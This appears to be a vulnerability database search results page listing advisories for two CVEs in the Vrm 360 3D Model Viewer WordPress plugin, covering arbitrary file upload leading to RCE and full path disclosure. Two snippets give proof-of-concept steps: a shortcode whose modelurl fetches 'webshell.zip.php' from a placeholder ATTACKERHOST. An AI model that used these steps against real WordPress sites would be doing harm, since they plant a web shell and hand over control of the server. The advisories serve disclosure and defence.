19 matches found
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311 Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311
CVE-2023-4311 affects the Vrm 360 3D Model Viewer WordPress plugin (versions up to 1.2.1). The vulnerability is an arbitrary file upload due to insufficient checks in a plugin shortcode, enabling potential remote code execution. Public sources in the connected records describe PoCs and demonstrat...
PT-2023-28700 · WordPress · Vrm 360 3D Model Viewer
Name of the Vulnerable Software and Affected Versions: Vrm 360 3D Model Viewer WordPress plugin versions 1.2.1 and earlier Description: The issue arises from insufficient checks in a plugin shortcode, allowing for arbitrary file upload. Recommendations: For Vrm 360 3D Model Viewer WordPress plugi...
WordPress Plugin Vrm 360 3D Model Viewer Security Vulnerability
WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers.WordPress plugin is an application plugin. A security vulnerability exists in WordPres...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. PoC 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
Path traversal
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-5177 Vrm 360 3D Model Viewer <= 1.2.1 - Full Path Disclosure
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-5177
CVE-2023-5177 affects the Vrm 360 3D Model Viewer WordPress plugin (
WordPress plugin Vrm 360 3D Model Viewer security vulnerability
WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. WordPress plugin is an application plugin that supports personal blogs on PHP and MySQL servers. A security vulnerability exists in the WordPress plugin...
WordPress Vrm 360 3D Model Viewer Plugin <= 1.2.1 is vulnerable to Sensitive Data Exposure
Software Vrm 360 3D Model Viewer Type Plugin Vulnerable versions = 1.2.1 Fixed in N/A OWASP Top 10 A5: Security Misconfiguration Classification Sensitive Data Exposure CVE CVE-2023-5177 Patch priority Low CVSS severity Low 4.3 Developer Claim ownership PSID 41f6e6c8c32c Credits Jonatas Souza Vill...
Vrm 360 3D Model Viewer <= 1.2.1 - Full Path Disclosure
Description The plugin exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode. PoC 1. Create a page 2. Place the shortcode vrm360 canvasname=s1 modelurl=SACharacter.zip aspectratio=1.8 initialoffset=0.9 on the page SACharacter.zip should be a...
Vrm 360 3D Model Viewer <= 1.2.1 - Full Path Disclosure
Description The plugin exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode. 1. Create a page 2. Place the shortcode vrm360 canvasname=s1 modelurl=SACharacter.zip aspectratio=1.8 initialoffset=0.9 on the page SACharacter.zip should be a non-existent...